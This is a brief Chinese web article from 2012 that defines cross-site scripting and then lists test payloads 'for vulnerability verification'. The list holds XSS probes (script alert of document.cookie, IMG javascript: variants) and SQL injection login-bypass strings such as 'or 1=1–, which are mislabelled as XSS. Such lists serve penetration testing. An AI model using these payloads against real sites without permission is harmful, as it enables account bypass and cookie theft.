XSS漏洞验证语句

XSS漏洞验证语句

2012-01-04 17:48:45     我来说两句      

收藏    我要投稿

XSS又叫CSS (Cross Site Script) ，跨站脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码，当用户浏览该页之时，嵌入其中Web里面的html代码会被执行，从而达到恶意用户的特殊目的。


相关测试代码，可供漏洞验证：

><script>alert(document.cookie)</script>
=’><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>
<script>alert(vulnerable)</script>
<script>alert(’XSS’)</script>
<IMG SRC=”javascript:alert(’XSS’);”>
<IMG SRC=javascript:alert(’XSS’)>
<IMG SRC=JaVaScRiPt:alert(’XSS’)>
<IMG SRC=JaVaScRiPt:alert("XSS")>
admin’–
’or 0=0 –
“or 0=0 –
or 0=0 –
’or 0=0 #
“or 0=0 #
or 0=0 #
’or ’x’=’x
“or ”x”=”x
’) or (’x’=’x
’or 1=1–
“or 1=1–
or 1=1–
’or a=a–
“or ”a”=”a
’) or (’a’=’a
“) or (“a”=”a
hi” or ”a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ’a’=’a
hi’) or (’a’=’a
hi”) or (“a”=”a